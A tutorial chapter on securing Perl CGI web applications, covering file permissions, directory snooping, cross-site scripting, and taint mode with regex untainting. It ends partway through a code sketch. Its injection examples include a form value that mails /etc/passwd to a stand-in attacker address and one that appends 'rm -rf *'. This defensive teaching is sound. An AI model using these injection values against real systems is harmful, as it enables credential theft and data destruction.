Web Security and eXtropia Applications
[ TOC ]
"All data is fraudulent.
All communications are attempted hacks.
All clients are thieves.
Technology is only my first and weakest line of defense"
- morning litany for a Web Server Administrator
The minute you connect your computer to the Internet is the minute that the
security of your data has been compromised. Even the most secure systems,
shepherded by the most intelligent and able system administrators, and
employing the most up-to-date, tested software available are at risk every
day, all day. As was proven by Kevin Mitnick in the celebrated cracking of
the San Diego Supercomputer Center in 1994, even the defenses of seasoned
security veterans like Tsutomu Shimomura can be cracked.
The sad fact is that crackers will always have the upper hand. Time,
persistence, creativity, the complexity of software and the server
environment, and the ignorance of the common user are their weapons. The
system administrator must juggle dozens of ever-changing, complex
security-related issues at once while crackers need only wait patiently for
any slip-up. And of course, system administrators are only human.
Thus, the system administrator's job certainly cannot be to build a
``cracker-proof'' environment. Rather, the system administrator can only
hope to build a ``cracker-resistant'' environment.
A cracker-resistant environment is one in which everything is done to make
the system ``as secure as possible'' while making provisions so that
successful cracks cause as little damage as possible and can be discovered
as soon as possible.
Thus, for example, at minimum the system administrator should back up all of
the data on a system so that if the data is maliciously or accidentally
erased or modified, as much of it as possible can be restored.
NOTE: By the way, don't think that just because your job
title is not officially "system administrator" that this
does not apply to you. In fact, as soon as you implement
a CGI application, you become a system administrator of
sorts. For example, the implementer of a WebStore CGI
application will have her own users, data files, and
security concerns. Thus, it is also your responsibility
to make security your number one concern.
Here is a rough checklist of minimum-level security precautions:
1. Make sure users understand what a good password is and what a bad
password is. Good passwords cannot be found in a dictionary and take
advantage of letters, numbers and symbols. Good passwords are also changed
with some regularity and are not written on scraps of paper in desk
drawers.
2. Make sure that file permissions are set correctly. All files should be
given the absolute minimum access rights.
3. Make sure to keep abreast of security announcements, bug fixes and
patches. For example, put yourself on a CERT (http://www.cert.org/) or a
CIAC (http://www.ciac.org/) mailing list and/or return regularly to the
sites that distribute the code you use. For eXtropia applications, add
yourself to the mailing list in order to get security bulletins.
4. Attempt to crack your site regularly. Learn the tools the crackers are
using against you and try your best to use those tools to crack yourself.
5. Make regular backups.
6. Create and check your log files regularly.
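As an illustration of item 2, the following is a minimal sketch of how you might look for files that are writable by everyone. The function name world_writable and the idea of passing a directory on the command line are assumptions made for this example; they are not part of any eXtropia application.

```perl
use strict;
use warnings;
use File::Find;

# Return the paths under $root whose permission bits allow writing
# by "other" (world-writable). Symbolic links are skipped.
sub world_writable {
    my ($root) = @_;
    my @found;
    find(
        {
            no_chdir => 1,
            wanted   => sub {
                my $path = $File::Find::name;
                return if -l $path;
                my @st = stat($path) or return;
                push @found, $path if $st[2] & 0002;
            },
        },
        $root
    );
    my @sorted = sort @found;
    return @sorted;
}

# Hypothetical usage: report on a directory tree named on the command line.
if (@ARGV) {
    print "$_\n" for world_writable($ARGV[0]);
}
```

Anything this reports deserves a second look. A file should stay world-writable only when you can say exactly why it has to be.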
[ TOC ]
Protecting a site is a serious matter and one that everyone should take
time to address. Unfortunately, too many web server administrators make the
mistake of saying that, "Since I don’t have a high visibility
site, and since I don't have a beef with anyone, no one will bother to
mess with me."
In fact, you are a target as soon as you have a web presence. Many crackers
need no greater excuse than the desire to cause mischief to crack your
site.
Once a cracker has access to your system, he or she can do all sorts of
mean and nasty things.
Consider some of the following possibilities:
1. Your data/files are erased.
2. Your data/files are sold to your competitor.
3. Your data/files are modified. Check out what happened to the CIA site
and others at http://www.2600.com/hacked_pages/.
4. The cracker uses your site to launch attacks against other sites. For
example, the cracker attempts to crack the White House server as you.
5. The confidential information provided by your clients is accessed and
used against them. ``Well, Mr. Powers, I see from this log file that you
have purchased one Swedish penis enlarger!''.
6. Cracker uses your account to launch attacks against other users on the
same box. Other innocent users have all this happen because of you.
[ TOC ]
Web services are some of the most dangerous services you can offer.
Essentially, a web server gives the entire net access to the inner workings
of your file system. What is worse, because web server software has only
been around since the early 1990s, the security community has had only a
limited amount of time to scrutinize it for security holes. Thus, web
servers amount to extremely powerful programs which have
only been partially bug-tested.
If that were not bad enough, web servers are typically administered by new
web server administrators with perhaps more experience in graphic design
than server administration. Further, many web servers are home to hundreds
of users who barely know enough about computers to write HTML and who are
often too busy with their own deadlines to take a moment to read things
such as this.
This is not to point fingers at anyone. Few people have time or inclination
to master security. And that is as it should be. The point is that bad
passwords, poorly written programs, world readable files and directories
and so forth will always be part of the equation and these are not things
that only security gurus can control.
[ TOC ]
Beyond the fact that web servers are insecure to begin with, web servers
make a bad situation worse by allowing users to take advantage of CGI
applications.
CGI applications are programs that reside on a server and can be run from a
web browser. In other words, CGI applications give Joe Cyberspace the
ability to execute powerful programs on your server that in all likelihood
are first generation, designed by amateurs, and full of security holes.
Yet, since most users have grown to expect CGI access, few system
administrators can deny their users the ability to write, install and make
public CGI applications of all sorts.
So what is a system administrator to do and how can users of CGI
applications help to promote the security of the server as a whole?
As is the case with all security, the administrator and users must attempt
to address the following precautions:
1. CGI applications must be made ``as safe as possible''.
2. The inevitable damages caused by cracked CGI applications must be
contained.
[ TOC ]
Needless to say, every application installed on a server should be reviewed
by as many qualified people as possible. At the very least the system
administrator should be given a copy of the code (before and after your
modifications), information about where you got the code, and anything else
she asks for.
Don't think of your system administrator as a paranoid fascist. She has a
very serious job to do. Help her to facilitate a safer environment for
everyone even if that means a little more work for you.
Besides that, you should read the code yourself. There is no better time to
learn this stuff than now. Although ignorant users will necessarily be part
of the security equation it does not give you the go-ahead to be one of
those users.
And remember, any bit of code that you do not understand is suspect. As a
customer, demand that application authors explain and document their code
clearly and completely.
However, you have a further responsibility. You have the responsibility to
keep aware of patches, bug fixes, and security announcements. It is likely
that such information will be posted on the site from which you got the
application. It certainly is posted on eXtropia. As new versions come out,
you should do your best to upgrade. And when security announcements are
issued, you must make the necessary modifications as soon as possible.
The fact that the information is available to you means that the
information is also available to crackers who will probably use it as soon
as it is available.
This point is particularly important for all you freelance CGI developers
who install applications for clients and then disappear into the sunset. It
is essential that you take the responsibility to develop an ongoing
relationship with your clients so that when security patches are released
you can notify them so that they can hire you or someone else to implement
the security changes.
[ TOC ]
Although this section is primarily focused on installing and customizing
pre-built web applications, no discussion of security would be complete
without a note on writing safe code. After all, some of the
installation/customization work you do might involve writing some code.
Perhaps the best source for information on writing safe CGI applications
can be found at Lincoln Stein's WWW Security FAQ
(http://www.w3c.org/Security/faq/). Lincoln Stein is a gifted CGI
programmer with several public domain talks and FAQs regarding techniques
for writing safe CGI.
You should not even consider writing or installing a CGI application until
you have read the entire FAQ. However, we will reproduce the most important
warning since it should be said several times.
In the FAQ, Stein writes the following,
"Never, never, never pass unchecked remote user input to a
shell command. In C this includes the popen(), and system()
commands, all of which invoke a /bin/sh subshell to process
the command. In Perl this includes system(), exec(), and
piped open() functions as well as the eval() function for
invoking the Perl interpreter itself. In the various shells,
this includes the exec and eval commands."
Backtick quotes, available in shell interpreters and Perl for capturing the
output of programs as text strings, are also dangerous. The reason for this
bit of paranoia is illustrated by the following bit of innocent-looking
Perl code that tries to send mail to an address indicated in a fill-out
form.
|
|
$mail_to = &get_name_from_input; # read the address from form
open (MAIL,"| /usr/lib/sendmail $mail_to");
print MAIL "To: $mail_to\nFrom: me\n\nHi there!\n";
close MAIL;
|
The problem is in the piped open() call. The author has
assumed that the contents of the $mail_to variable will always
be an innocent email address. But what if the wily hacker passes an email
address that looks like this?
|
|
nobody@nowhere.com; mail badguys@hell.org</etc/passwd;
|
Now the open() statement will evaluate the following commands:
|
|
/usr/lib/sendmail nobody@nowhere.com
mail badguys@hell.org</etc/passwd
|
Unintentionally, open() has mailed the contents of the system
password file to the remote user, opening the host to password-cracking
attack.
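One way to avoid the problem Stein describes is sketched below. It makes two assumptions that are not in the original text: the address is checked against a deliberately conservative pattern, and sendmail is started with the list form of open() and the -t switch, so that no shell is involved and the recipient is read from the message headers rather than the command line. The function names safe_address and send_greeting are hypothetical.

```perl
use strict;
use warnings;

# Accept only a conservative address shape: a word character first,
# then word characters, periods and hyphens around a single @.
# Spaces, semicolons, redirections and newlines are rejected outright.
sub safe_address {
    my ($input) = @_;
    return undef unless defined $input;
    return $input =~ /\A(\w[\w.-]*\@[\w.-]+)\z/ ? $1 : undef;
}

# Send a fixed message. The list form of a piped open() runs sendmail
# directly, without /bin/sh, and -t tells sendmail to take the
# recipient from the To: header.
sub send_greeting {
    my ($input) = @_;
    my $to = safe_address($input)
        or die "Refusing suspicious address\n";
    open(my $mail, '|-', '/usr/lib/sendmail', '-t', '-oi')
        or die "Cannot start sendmail: $!\n";
    print {$mail} "To: $to\nFrom: me\n\nHi there!\n";
    close($mail) or die "sendmail failed: $! $?\n";
    return 1;
}
```

With this check in place, the address from the attack above is refused before sendmail is ever started, while an ordinary address such as nobody@nowhere.com passes through unchanged.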
Other CGI security FAQs include:
1. NCSA Security FAQ: http://hoohoo.ncsa.uiuc.edu/cgi/security.html
2. eXtropia Taint Mode FAQ: http://www.extropia.com/tutorials/taintmode.html
3. CGI Security: Better Safe Than Sorry: http://www.irt.org/articles/js184/index.html
[ TOC ]
Have you ever investigated a web site by modifying the URL? For example,
let's look at one of the pages on eXtropia that can be found at http://www.extropia.com/news.html.
Notice that we are looking at the document news.html file that is in the
root directory of the web server ``www.extropia.com''.
Suppose we are interested in knowing what other documents are located in
the ``private_stuff'' directory (perhaps documents under development,
documents which have been forgotten about, or documents which might have
unlisted links for internal use only). To find out, we remove the
``news.html'' reference and test to see whether the web administrator has
configured the web server to generate a dynamic index and has not included
an index file.
In this case we have not included one, so what comes back is a dynamically
created index page containing all files and sub-directories. In fact, many
servers on the web are configured so that if the user has not provided an
index.html file, the server will output a directory listing of this kind.
This is not exactly
a security bug. Oftentimes, as is the case with our site, the system
administrators wanted users to be able to view directory structures.
However, if the server is set to produce a dynamically generated index of a
cgi-bin directory, the results can be devastating.
1. Configure the web server to not generate dynamically produced indexes
but return an error message instead.
2. Configure your web server to not serve any document other than .cgi
documents from within a cgi-bin directory tree.
3. Provide an index.html file with nothing in it so that even if the web
server is not configured for CGI security, the cracker will be stopped in
their tracks.
4. Move as many of the sensitive files as you can out of the web document
tree.
There is another aspect of the snooper that you should definitely be aware
of when installing pre-built applications. Snoopers have just as much
ability to download the source code and read through it as you do. Thus,
they are aware of all of the pre-configured options that are set by
default.
In particular, they are aware of filenames and relative directory
locations. Thus, if you do not change the default names of files and
directories, even if you have stopped them from using the back door and
getting directory listings as shown above, they will still know what is
available and can access it directly.
In other words, if I know that you are using ``CGI application A'' and that
``CGI application A'' uses a file called ``users.dat'' in a subdirectory
called ``Users,'' I might look for it directly using:
http://www.yourdomain.com/cgi-bin/ScriptA/Users/users.dat
In such a way, a cracker could easily gain sensitive information.
As a result, it is crucial that you also rename any file or directory that
contains sensitive information. Once you have made it impossible for the
hacker to get a dynamically generated index and you have changed all
filenames and directory names, it will be much more difficult for the
cracker to find her way in.
[ TOC ]
It is pretty much unavoidable. Any truly complex CGI application is going
to have to write to the file system. Examples of writing to the file system
include adding to a password file of registered users, creating lock and
log files, or creating temporary state maintenance files.
The problem with this is two-fold. First, if the web surfer is given
permission to write, she is also, necessarily, given permission to delete.
Writing and deleting come hand in hand. They are considered equal in terms
of server security.
The second problem with writable files is that it is possible that a
cracker could use the writable area within your cgi-bin tree to add a CGI
application of their own. This is particularly dangerous on multi-user
servers such as those used by your typical ISP. A cracker need only get a
legitimate account at the same ISP you are on long enough to exploit the
security hole. This amounts to 20 minutes worth of payment on their part.
NOTE: By the way, this cracker tactic of getting an
account on your ISP also has serious implications for
"snooping". If the cracker can get an account on your
server, there is little to stop her from getting at your
cgi-bin directory and snooping around. With luck, your ISP
runs a CGI wrapper which will obfuscate your cgi-bin area
to some degree, but one way or the other, so long as you
host your web site on a shared server, your security is
seriously compromised. This makes backups even more
crucial!
For the most part, the solution to this is to never store writable
directories or files within your cgi-bin tree. All writable directories
should be stored in less sensitive areas such as outside of your HTML tree
or in directories like /tmp that are already provided for insecure file
manipulation. A cracker could still erase your data but they could not
execute their own rogue CGI application.
However, as we said before, security is about containing damage as well as
it is about plugging holes. Thus, it is essential that you protect all
files against writing unless you are currently working on them. In other
words, if you are not editing an HTML file, it should be set to read-only
access. If you are not currently editing the code of a CGI application, it
should be stored as read-execute-only.
In short, never grant write permission to any file on your web server
unless you are specifically editing that file.
Finally, always back up your files regularly.
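The rule above can be applied with Perl's built-in chmod. The following is a small sketch; the function name make_read_only is an assumption made for this example. It clears every write bit and leaves the read and execute bits alone, so an HTML file at 0644 ends up at 0444 and a CGI script at 0755 ends up at 0555.

```perl
use strict;
use warnings;

# Remove every write bit from a file, leaving the read and execute
# bits untouched.
sub make_read_only {
    my ($path) = @_;
    my $mode = (stat $path)[2];
    defined $mode or die "Cannot stat $path: $!\n";
    chmod(($mode & 07777) & ~0222, $path)
        or die "Cannot chmod $path: $!\n";
    return;
}
```

When you need to edit a file again, restore write permission for yourself only and remove it when you are done.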
[ TOC ]
All input is an attempted hack. All input is an attempted hack. All input
is an attempted hack. Learn those words and repeat them to yourself every
day. It is essential for you to consider all information that comes into
your CGI application as tainted. The example shown earlier provided by
Lincoln Stein is a good example of the kinds of havoc a cracker can create
with tainted data. A cracker could easily attempt to use your CGI to
execute damaging commands.
An interesting addition to what Stein has to say relates to Server Side
Includes (SSI). That is, if your server is set to execute server side
includes, it is possible that your CGI application could be used to execute
illegitimate code.
Specifically, if the CGI application allows a user to input text that will
be echoed back to the web browser window through plain HTML files, the
cracker could easily input SSI code. This is a common misconfiguration
error for programs like guestbooks. The solution to this problem, of
course, is to filter all user data and remove any occurrence of SSI
commands. Typically, this is done by changing all occurrences of ``<!''
to ``<-''. Thus, SSI commands will be printed out instead of executed.
A better option is to disable SSI command execution altogether, since it
is even more dangerous than CGI, especially when combined with CGI.
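A filter of this kind can be very small. The sketch below shows one possible form of the substitution, under the assumption that replacing the opening ``<'' of an HTML comment with the entity &lt; is acceptable for your application. The function name neutralize_ssi is hypothetical.

```perl
use strict;
use warnings;

# Replace the "<" that opens an HTML comment with the entity &lt;
# so that an SSI directive such as <!--#exec cmd="..."--> is shown
# as text instead of being handed to the server's SSI parser.
sub neutralize_ssi {
    my ($text) = @_;
    $text =~ s/<!--/&lt;!--/g;
    return $text;
}
```

Run every piece of user-supplied text through the filter before it is written into a file that the server might parse for includes.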
[ TOC ]
In February 2000, CERT posted advisories related to CSS, or Cross Site
Scripting. No, this is not the same as CSS, Cascading Style Sheets, but
rather is the unfortunate acronym that CERT assigned to this problem.
In a nutshell, the advisory ultimately related to the fact that you cannot
trust user input in CGI scripts, especially if that
input will be used to produce further output from the CGI script.
Previously we talked about how user input needs to be watched relative to
causing damage to your web site. But what about the other visitors to your
site?
Badly coded HTML can be equally annoying or, if it takes advantage of
browser security problems, dangerous. Consider a piece of JavaScript code
that continually places alert() dialog boxes on a user's
browser. That user would probably not want to come back to your site soon
afterwards.
However, if you allow other users to post HTML into a message forum,
guestbook, or another application where users share information, then you
are opening your web site to this problem of Cross Site Scripting, where a
user can post malicious code on your application that other users access.
To avoid this problem, there are a few things you should consider doing in
such applications. First, you could use Extropia::DataHandler::HTML. This
data handler escapes HTML tag characters so that they are rendered useless
(e.g., replacing < with &lt;). Another technique is to enable
authentication for user data submissions so that you can keep track of who
posted malicious HTML code.
In addition, because there are problems with how browsers interpret
different character sets, the < and > characters can sometimes have aliases
in a different character set. To get around this problem, the
character set should be explicitly stated along with the Content-Type
header. Note that the latest versions of CGI.pm and the Apache web server
tack on an explicitly stated character set by default since the CSS issue
was announced by CERT.
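To make the two precautions concrete, here is a hand-rolled sketch that escapes markup characters and states the character set explicitly. It does not use or reproduce the interface of Extropia::DataHandler::HTML. The function names escape_html and render_comment, and the choice of ISO-8859-1, are assumptions made for this example.

```perl
use strict;
use warnings;

# Escape the characters that let user text break out into markup.
# The ampersand is handled first so that the entities produced by
# the later substitutions are not escaped a second time.
sub escape_html {
    my ($text) = @_;
    $text =~ s/&/&amp;/g;
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    return $text;
}

# Build a CGI response that states its character set explicitly and
# echoes the user's comment only after escaping it.
sub render_comment {
    my ($comment) = @_;
    return "Content-Type: text/html; charset=ISO-8859-1\r\n\r\n"
         . "<p>" . escape_html($comment) . "</p>\n";
}
```

A posted script tag then reaches other visitors as harmless visible text rather than as code their browsers would run.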
To obtain more details on CSS, the following two URLs should help you get
started:
http://www.cert.org/advisories/CA-2000-02.html
http://www.cert.org/tech_tips/malicious_code_mitigation.html
[ TOC ]
Another thing to understand about the legitimacy of incoming data is that
even the data that is supposedly generated administratively can be tainted.
It is very easy, for example, to modify hidden form fields or add custom
fields to the form data sent to an application. In fact, a cracker could
simply download your HTML form, modify it, and submit faulty data to your
CGI application from their own server.
Taint mode is a mode in Perl in which all data that has originated from or
come into contact with user
input is considered suspect, or tainted. When running in taint mode, Perl
makes sure that tainted data cannot be used to perform operations that
might have destructive consequences if the data did not fit the expected
input to the program. It turns out that this capability is extremely useful
for CGI applications.
Unfortunately, only a few references to taint mode documentation exist. Even
worse, there are virtually no public domain Perl CGI scripts that enable
taint mode and that you could learn from by example.
However, if you would like to learn more, there are still a few useful
references. O'Reilly's Programming Perl book has a section on handling
insecure data that is also reflected in perldoc’s perlsec guide to Perl
Security within the Perl distribution. On the FAQ front, Lincoln Stein's
WWW Security FAQ is located at http://www.w3c.org/Security/faq/,
and our own taint mode security FAQ is at http://www.extropia.com/tutorials/taintmode.html.
[ TOC ]
Freeware CGI applications are available for download all over the Web. But
how many of them are really secure? When you download an application do you
check all the logic to make sure it is secure? Do you read through each
line of code and anticipate all the ramifications? Most of the time the
answer is ``no''. After all, the whole point of downloading software is to
get it and run it for free without having to do a lot of work.
Unfortunately, the harsh reality is that if you are really interested in
security, there isn't any free lunch out there.
The more complicated a CGI application is, the more likely you will want to
find someone else who has already programmed it and avoid doing the work
yourself. Also, the more complex a script, the less likely you will care to
spend the time scrutinizing it.
The problem is that regardless of how good the author is, every large
program has a good probability of having bugs -- with an additional
probability that some of them may be security bugs.
However, unlike other languages, Perl offers an ingenious programming model
built to check for security issues: taint mode. Basically, taint mode puts
a Perl application into ``paranoid'' mode and treats all user supplied
input as tainted unless the programmer explicitly ``OKs'' the data.
[ TOC ]
To enable taint mode for a script on a site which has Perl 5, change the
line at the top of your CGI script from
#!/usr/local/bin/perl
to
#!/usr/local/bin/perl -T
Unfortunately, non-UNIX web servers may have trouble activating taint mode
for CGI scripts. Non-UNIX servers typically do not recognize the magical
#!/usr/local/bin/perl first line of a CGI script. Instead, the web server
knows what language to execute the script with because of an operating
system or web server configuration variable.
For example, for IIS on NT, you should change the association of Perl
scripts to run with taint mode on. Unfortunately, this changes the
association for all your Perl scripts. You may not want this behavior if
you have legacy scripts that are not built to handle taint mode.
A more reasonable way is to get around the problem by creating a second
extension under NT such as tcgi or tgi and associate it with taint mode
Perl. Then, rename the applications with the new extension to activate
taint mode on them. Thus, even if you have legacy scripts that cannot
handle taint mode activation, their migration to taint mode can happen in a
planned fashion rather than all at once.
You could also try using another web server that understands the first line
of scripts. For example, SAMBAR, a freeware NT web server, can be
configured to run the script based on the first line of the cgi script.
Apache for Windows also has a similar capability. In this case, you would
change the first line to read something like the following:
|
|
#!c:\perl\bin\perl.exe -T
|
Note: when you execute a taint mode script from the
command-line with the Perl executable, you must pass
the -T parameter to the Perl executable or Perl will
complain that the '-T' argument was passed too late
in the first magic line of the Perl file.
[ TOC ]
You should test your application thoroughly to see if turning on taint mode
stops any valid part of your program from executing. Usually the majority
of your application will work well. In fact if you are lucky, the whole
program may work without any changes at all!
The major caveat to this is that taint mode is not a compile time check. It
is a run-time check.
Run-time checking means that taint mode Perl is constantly and vigilantly
checking to see if the application is going to do anything unsafe with user
input while the program runs. It does not stop checking after the
application first loads and compiles (compile-time checking).
Unfortunately, run-time checking means that you need to test all logical
paths of execution your application might take so that ``legal operations''
do not get halted because of taint mode. Taint mode, because it is ultra
paranoid, will likely stop actions that you want your program to take.
Thus, you must go through the program with a fine-tooth comb. If any part
of your program fails to execute, then you need to find out what taint mode
does not like about the program and rectify it.
Fortunately, the applications and objects in this book have been thoroughly
tested with taint mode. However, if you add your own additions or objects,
you should always conduct a test of the operations of your program to make
sure it is still doing what you want.
Likely, if there is a problem with taint mode, you will encounter an error
in the Web Server error log. For example, if we try to run a program with
tainted user input passed to a system call, we would get something that
looks like the following error:
|
|
Insecure dependency in system while running with -T switch at ...
|
Likewise, if we have an unclean PATH, a system call may complain about the
path being insecure:
|
|
Insecure $ENV{PATH} while running with -T switch at ...
|
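The usual cure for the second error is to set the search path yourself before making any system call. The following sketch follows the approach described in Perl's own perlsec documentation. The function name clean_environment and the particular directories in the path are assumptions, so adjust them to suit your server.

```perl
use strict;
use warnings;

# Give child processes a fixed, minimal search path and drop the
# environment variables that can change how a shell behaves.
sub clean_environment {
    $ENV{PATH} = '/bin:/usr/bin';
    delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};
    return;
}

clean_environment();
```

Because the new value of PATH is a literal string in your program rather than something inherited from outside, Perl no longer treats it as suspect.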
[ TOC ]
For a CGI application, the only user input is user submitted form data. It
is this user input that the Perl application will consider ``tainted''.
This does not mean that you have to immediately go through a lot of hoops
to untaint all the form variables that come in. Not only would that be a
big pain to do, but it's unnecessary.
Instead, Perl only considers the combination of form variables plus the use
of a potentially ``unsafe'' operation to be illegal. Potentially ``unsafe''
operations are operations that could have a permanent destructive effect if
the wrong parameters are passed.
Potentially unsafe operations include, but are not necessarily limited to,
system calls of any sort such as using system, backticks or piped open
function calls, open calls that can write to disk, unlink which deletes
files, rename, as well as the evaluation of code based on user input.
In the example given below, we use ``mail'' as an example program, but
really the examples here apply to any system call with command line
parameters.
For example, if the CGI object's email form variable is ``tainted'', then
the following would still be legal:
|
|
print $cgi->param("email") . "\n";
|
This passes Perl’s taint mode check because the print command is not an
unsafe operation. But if you try to pass the same variable to an unsafe
version of a system call, Perl will complain.
|
|
system("mail " . $cgi->param("email"));
|
This operation is illegal under taint mode. Making an unsafe system call
plus passing form data as a command line argument is terribly unsafe and is
considered unacceptable by Perl running in taint mode. Consider what would
happen if someone entered an email address on the form like
|
|
me@mydomain.com; rm -rf *
|
This would cause the mail program to be executed with the following
command-line:
|
|
mail me@mydomain.com; rm -rf *
|
The mail program would execute, but at what cost? The semi-colon is a shell
metacharacter that tells the operating system shell to launch another
command. In this case, it is the malicious 'rm -rf *' that is a command to
delete all files for the current directory and all subdirectories
recursively.
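The role the shell plays here can be seen by starting a program with a list of arguments instead of a single command string. In the sketch below, which assumes a UNIX-like server, the child process is simply the Perl interpreter itself ($^X) printing its first argument, and the injected command is a harmless echo. The function name echo_argument is hypothetical.

```perl
use strict;
use warnings;

# Run a child process with an argument list instead of a command
# string. No shell parses the arguments, so ";" reaches the child
# as an ordinary character rather than as a command separator.
sub echo_argument {
    my ($arg) = @_;
    open(my $child, '-|', $^X, '-e', 'print $ARGV[0]', $arg)
        or die "Cannot start child: $!\n";
    local $/;                 # read the whole output at once
    my $output = <$child>;
    close($child);
    return $output;
}

print echo_argument('me@mydomain.com; echo INJECTED'), "\n";
```

The child receives the whole string, semicolon included, as one argument, and the second command never runs. This complements untainting rather than replacing it: the program you call may still misinterpret a hostile argument on its own.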
[ TOC ]
A shell metacharacter is a special character that has meaning to a shell or
command-line interpreter that tells it to execute a command or perform some
action. Therefore, shell metacharacters are the most dangerous to pass to
an executable program because they can cause unexpected and undesirable
behavior.
The following is a sample list of shell metacharacters:
& ; ` ' \ " | * ? ~ < > ^ ( ) [ ] { } $ \n \r
Clearly, there are security ramifications. With taint mode turned on
though, the Perl interpreter will stop this from occurring at all. However,
Perl can't tell what is in the CGI object -- it just assumes HTML form data
is tainted whether it is friendly or not. Just to be on the safe side, Perl
assumes that all users are malicious.
Thus, if you want to perform that type of command with a user supplied
variable, you must always untaint it regardless of whether it contains
harmless input or not. Remember, Perl only sees that the string was created
as a result of user input (such as a form variable). It has no way of
knowing whether the string is safe or not until you untaint it with the
techniques we outline here.
It is important to emphasize that this advice is true even for hidden form
tags in an HTML page. HIDDEN form tags that are not directly entered by a
user are considered tainted by Perl because Perl has no way of telling that
the user did not enter that form variable.
After all, it is possible for a user to create their own HTML form and
place their own hidden tag values on that form. In other words, all form
data passed to the CGI script is considered tainted by Perl.
[ TOC ]
The primary way to untaint a variable is to do a regular expression match
using parenthetical groups inside the regular expression pattern. In Perl,
the text matched by the first parenthetical group is stored in the special
variable ``$1'', the text matched by the second group in ``$2'', and so on.
Perl considers these new variables that arise from parenthetical groups to
be untainted because they arose from a clean operation. Once your regular
expression has created these variables, you can use them as your new
untainted values.
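As a small, generic illustration of parenthetical groups, the sketch below splits a ``name=value'' string into its two halves. The data, the pattern and the function name split_pair are all made up for this example. When the script runs under taint mode, the captured values are the ones Perl regards as clean.

```perl
use strict;
use warnings;

# Split a "name=value" string with two parenthetical groups.
# On a successful match, $1 holds the text matched by the first
# group and $2 the text matched by the second.
sub split_pair {
    my ($data) = @_;
    if ($data =~ /\A(\w+)=(\w+)\z/) {
        return ($1, $2);
    }
    return;    # empty list: the data did not fit the pattern
}

my ($name, $value) = split_pair('color=blue');
print "$name / $value\n";    # prints "color / blue"
```

Note that the pattern describes what is allowed rather than what is forbidden, so anything unexpected simply fails to match.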
The following will illustrate this:
Email addresses consist of word characters (a-zA-Z_0-9), dashes, periods
and an @ sign. So we want to match this descriptive template. But there is
a catch.
If we allow email addresses to have dashes, a lot of programs use dash to
signify a command-line parameter. So although we allow dashes in the email
address, if you want to be extra careful, make sure that the first
character of the email address is only a word character and does not
contain dashes or periods. The likelihood that someone really has an email
address that begins with a period or dash is relatively low.
Thus, our descriptive template becomes the following:
1. Match the first character as a word character, with no extras such as
dashes allowed.
2. Match 0 or more subsequent characters as word characters, dashes, or
periods.
3. Match one @ symbol after the preceding two rules.
4. Match at least one character for the domain name of the email server
after the @ symbol. This can consist of word characters, dashes, and
periods.
The regular expression for this template is:
    /
      \w{1}     # match 1 word character
      [\w-.]*   # match 0 or more word characters, hyphens, or periods
      \@        # match one @ symbol
      [\w-.]+   # match 1 or more word characters, hyphens, or periods
    /x
The trailing x modifier is what allows the pattern to be spread over
several lines with comments.
Note: some of these characters are considered
shell meta characters. However, because we are
disallowing white space as well as forcing the
first character to be a word character not
containing any meta characters, we are
significantly safer.
Further, let us assume that somewhere in the program a variable called
$email has been assigned a value submitted by the user from an HTML form,
using a statement like the following:
    $email = $cgi->param("email");
The $email variable is now tainted as well. This is because its value
arose directly from tainted (user input) data, namely the CGI object form
variable returned from the param method.
So to untaint a variable called $email, you would do the following with a
regular expression. Notice the addition of the parentheses to create a
parenthetical grouping.
    if ($email =~ /(\w{1}[\w-.]*)\@([\w-.]+)/) {
        $email = "$1\@$2";
    } else {
        # Report the rejected value and the client address on STDERR.
        warn("TAINTED DATA SENT BY $ENV{'REMOTE_ADDR'}: $email");
        $email = "";    # successful match did not occur
    }
OK. Let's go over this in a little more detail.
When you use () inside a regular expression, each group of parentheses is
mapped to a numbered variable: $1 for the first group, $2 for the second,
and so on, counting the groups from left to right.
In the above example, the first parentheses surround (\w{1}[\w-.]*). This
expression matches exactly one word character followed by zero or more word
characters, dashes, and periods. Because of the parentheses, this first
match gets assigned to $1 by Perl.
Then, an @ symbol is matched.
Finally, the second set of parentheses ([\w-.]+) matches one or more of any word characters, dashes, and periods. This
second match gets assigned to $2 by Perl.
If the regular expression is successful, $1 (first
parenthetical match) will equal the username portion of the email address
and $2 (second parenthetical match) will equal the domain
portion.
Thus, the next command, $email = "$1\@$2"; replaces the previously tainted email variable with the safe counterparts:
$1 followed by an @ symbol followed by $2.
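The walkthrough above can be condensed into a small helper. This is a sketch under assumptions, not code from the eXtropia modules: the name untaint_email is hypothetical, and unlike the pattern in the text it anchors the match with \A and \z so that the entire value, not just a portion of it, has to fit the template. The hyphen is also moved to the end of each character class, where Perl reads it literally without a "False [] range" warning.

```perl
use strict;
use warnings;

# Hypothetical helper: returns a copy of the address built from $1 and $2,
# or undef if the whole value does not fit the template.
sub untaint_email {
    my ($raw) = @_;
    return undef unless defined $raw;

    # \A and \z tie the match to the entire string.
    if ($raw =~ /\A(\w[\w.-]*)\@([\w.-]+)\z/) {
        return "$1\@$2";
    }
    return undef;
}
```

A caller would then test the result, for example `my $email = untaint_email($cgi->param("email"));`, and treat an undefined value as rejected input.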
Notice that $1 and $2 are both considered
untainted now. This is very important to see.
Yes, they did arise from the user input data, but Perl considers these
variables special. Because they resulted from a regular expression you set
up, Perl assumes that you have explicitly checked the data for validity in
that regular expression. Thus, $1 and $2 are not considered tainted because
Perl believes in your ability to set up a good clean regular expression
check.
On the other hand, if the user entered an email address that did not match
this ``template'', the regular expression will have failed and $1 and $2
will not hold values from it. The example above would assign $email = ""
in this case because we would have executed the else clause.
Of course, if the user is trying to hack your system, this is a good thing.
You only want valid email addresses to come through. You should generally
check for the failure of the regular expression as we did above. Then, in
the else clause you can do something about the bad data.
As an additional plus, checking for the failure of the regular expression
allows you to do something such as print an informational message to STDERR
about the variable that did not pass taint checking along with the IP
address of the user that tried to pass it. An example of this was
illustrated in the else block of code above.
When a CGI script prints to STDERR, that output goes to your Web Server's
error log. You should always check your error log for potential hack
attempts. Of course, you could always add more sophisticated means of
notification such as emailing the bad data directly to you.
Also, if you are really worried about your program's integrity, you could
use die() instead of warn() to stop the program
rather than quietly warning you.
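A reporting routine along these lines might look like the following sketch. The name report_bad_input is hypothetical, and the replacement of non-printable characters is an added precaution (an assumption, not something the original example does) so that a submitted value cannot add lines of its own to the error log.

```perl
use strict;
use warnings;

# Hypothetical helper: report a rejected form value on STDERR, which the
# web server normally copies into its error log.
sub report_bad_input {
    my ($field, $value) = @_;
    $value = '' unless defined $value;

    # Replace anything outside printable ASCII with a question mark.
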